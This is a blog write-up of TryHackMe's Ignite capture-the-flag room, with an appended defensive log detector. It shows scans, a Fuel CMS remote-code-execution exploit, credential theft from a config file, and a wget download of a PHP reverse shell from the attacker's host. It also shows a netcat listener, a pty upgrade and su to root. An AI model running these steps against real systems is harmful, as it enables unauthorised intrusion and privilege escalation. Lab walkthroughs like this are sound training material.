TryHackMe | Ignite Writeup

Carson Shaffer
6 min read · Jul 27, 2022

TryHackMe’s Ignite room is an easy room involving a vulnerable CMS service and a reverse shell to get from an initial nmap scan to root access. This writeup will go through every step required to complete the room.

Task 1: Root it!

1. User.txt
Let’s start the target machine by clicking the green “Start Machine” button at the top of the task. We then need to connect to the TryHackMe network. I’m using my own Kali virtual machine so I’ll connect over OpenVPN.

Starting the target machine

Now that we have everything set up, we can start breaking into the machine. Let’s start with a basic nmap scan. We want to list the services and we want the output to be very verbose, so we’ll use the -sV and -vv flags. The full command will look like the following.

nmap -sV -vv 10.10.175.67

We get a single HTTP service as a result.

Results of the nmap scan

Let’s navigate to this website and see what’s on there.

Navigating to the website

We’re met with the default page for Fuel CMS. While we read what’s here let’s start a Gobuster scan in the background to see if there are any hidden directories. We’ll use the common.txt wordlist so the full command will look like the following.

gobuster dir -u http://10.10.175.67 -w /usr/share/wordlists/dirb/common.txt

Which gives us a small list of directories.

Results of the Gobuster scan

While the scan was going, I found two interesting things listed on the Fuel CMS website. The first lists a possible location for usernames and passwords.

Possible location for credentials

The second lists the default login for the admin panel on the site.

Default credentials

Let’s see if we can access the admin panel using these credentials.

Accessing the admin panel

I was able to access the admin panel but nothing would load. Hopefully nothing here is necessary because I can’t access any of the pages. I looked at some of the Gobuster directories but they also didn’t contain anything interesting. The default page listed the version as 1.4; let’s see if there are any vulnerabilities for this version. We can use Exploit-DB to check for this.

There are three remote code execution (RCE) exploits that we can use on this version of the CMS.

Exploits for Fuel CMS

Let’s download the third one and see if we can utilize it against the service.

Using the exploit

It worked! The default page of the website listed a file location, so let’s see if we can use “cat” to display the contents of that file. We’ll send the following command to the machine.

cat fuel/application/config/database.php

From this we get a big piece of information, the root credentials.

Getting the root credentials

We know the credentials to log in as root, but we have no way of using them yet. We need to get a shell on the system so we can switch our user to root. Before that though, let’s see if we can get the user flag using this command interface.

Getting the user flag

Nice! We got the user flag; now let’s move on to getting into the system.

2. Root.txt
We need a way to get a shell on the system; “sudo -l” doesn’t return anything to us. In my last writeup, I used wget to exploit the machine; maybe on this machine we can use it to move a shell from our system onto the target.

We’ll use PentestMonkey’s PHP reverse shell for our shell. We’ll start by downloading the shell and replacing the IP and port with our own.

Changing values in shell

Next we need to set up an HTTP server on our machine for the target to get the shell from. We can do this with Python, using the following command.

python3 -m http.server 80

This then will tell us that we’re serving HTTP on port 80.

Serving HTTP using python

Everything is set up, so let’s run the following command on the target machine to download the shell.

wget http://<our_IP>/shell.php

We’ll see the following in our HTTP server window confirming that it was downloaded.

The shell has been downloaded

Now we can start a netcat listener on our machine to catch the shell when we activate it. We can use the following command to start that.

rlwrap nc -lvnp 4444

If you need an explainer on the flags specified in the listener, click here.

Starting our netcat listener

We are ready to catch the shell. Let’s activate the shell by navigating to the file on the website.

Navigating to the shell to activate it

The website hangs when we navigate to the shell; let’s check our listener to see if we have a shell.

Catching the shell

We caught the shell! We can’t get to root yet, though, because our shell is not interactive. Let’s upgrade our shell using python. We can run the following command to upgrade.

python -c 'import pty; pty.spawn("/bin/bash")'

Upgrading our shell

Now that we can interact with the shell, let’s use “su root” with the password we found earlier to get root on the machine.

Getting root

We have root! Let’s grab the flag now and finish up the room!

Getting the root flag

We’ve completed the room! We went from an nmap scan to root access using a vulnerable CMS, a reverse shell, and shell upgrades. I hope this writeup could be helpful in completing the room! If you are still struggling please leave a comment or message me on Twitter and I will try my best to assist!
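
A defender's view of the steps above, as an added example that is not part of the original writeup: a small detector that flags the commands this walkthrough ran from the web server account (the wget download, the interactive shell, the pty upgrade and the su attempt). The pipe-delimited process-log format, the account names in WEB_USERS and the sample events are constructed assumptions.

```python
from os.path import basename

# Assumption: the web server and its PHP code run as one of these accounts.
WEB_USERS = {"www-data", "apache", "nginx"}

def classify(argv):
    """Return the rule name matched by one command line, or None."""
    prog, args = basename(argv[0]), argv[1:]
    if prog in {"wget", "curl"}:
        return "download-tool"
    if prog in {"sh", "bash", "dash"} and "-i" in args:
        return "interactive-shell"
    if prog.startswith("python") and any("pty.spawn" in a for a in args):
        return "pty-spawn"
    if prog == "su":
        return "su-attempt"
    return None

def detect(lines):
    """Return (timestamp, rule, parent, cmdline) for flagged web-account commands."""
    alerts = []
    for line in lines:
        # Assumed record layout: timestamp|user|parent process|command line
        parts = line.strip().split("|", 3)
        if len(parts) != 4 or parts[1] not in WEB_USERS:
            continue  # malformed record, or not a web server account
        ts, _user, parent, cmdline = parts
        argv = cmdline.split()  # whitespace split tolerates unbalanced quotes
        rule = classify(argv) if argv else None
        if rule:
            alerts.append((ts, rule, parent, cmdline))
    return alerts

def is_chain(alerts, minimum=3):
    """Several distinct rules together point to a web shell, not a one-off."""
    return len({rule for _, rule, _, _ in alerts}) >= minimum

# Constructed sample events (not taken from the room or from the writeup).
SAMPLE_LOG = """\
2022-07-27T10:01:02|www-data|apache2|wget http://192.0.2.10/shell.php
2022-07-27T10:03:40|www-data|apache2|/bin/sh -i
2022-07-27T10:04:05|www-data|sh|python -c 'import pty; pty.spawn("/bin/bash")'
2022-07-27T10:04:30|www-data|bash|su root
2022-07-27T10:05:00|alice|bash|wget https://example.com/notes.txt
"""

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG.splitlines()):
        print(*alert)
```

Only the four commands run by the web account are flagged; the same wget run by an ordinary user is ignored, which keeps the rule focused on a service account doing things a web application has no reason to do.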

Lessons Learned:

  • Python can be used to host an HTTP server
  • Outdated applications are vulnerable

Things I struggled with:

I had trouble using the commands in the exploit. I was trying to use commands one at a time to change directories but I had to input them all at once for it to work correctly. Other than that I think I got everything else pretty quickly and understood what to do.

Conclusion:

This room is okay. I liked having to use the exploit but being able to get root just by reading the default page wasn’t great in my opinion. Most of the other things needed to root the machine are common in other rooms so there wasn’t really anything that I hadn’t seen before. I don’t think this room would be very difficult for someone who has completed one or two other rooms.
